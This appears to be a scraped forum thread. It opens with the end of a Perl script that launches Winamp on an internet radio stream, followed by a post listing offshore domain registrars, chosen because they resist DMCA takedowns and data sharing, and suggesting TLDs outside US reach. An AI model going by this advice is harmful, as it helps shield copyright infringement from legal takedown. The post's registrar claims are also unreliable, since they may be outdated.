    print "\n\x20\x1a\x20Playing goa-psy...\n"; sleep 2;
    system("start C:\\Progra~1\\Winamp\\winamp.exe http://scfire-ntc-aa01.stream.aol.com:80/stream/1008");
    sleep 1; print "\x20\x1a\x20All Done!\n"; sleep 1;

    # Codename: Threetwoees

  9. This post will contain a list of domain registrars that are offshore. By 'offshore' I mean they won't share your data with 3rd parties like US companies and won't suspend a domain based on DMCA.

    Here we go

    http://prq.se/

    -Offer Anonymous Domain Registration (Based in Sweden)

    http://www.binero.se/

    -PirateBay.se domain registrar

    http://netart-registrar.com/

    - torrentz.eu domain registrar

    http://www.webnames.ru

    -Good registrar for .su and .ws

    Remember: If you choose a .com, .net or .org you will still be subject to US law. This means a court order to Verisign and you've lost your domain.

    Some offshore domain TLDs: .ws, .su
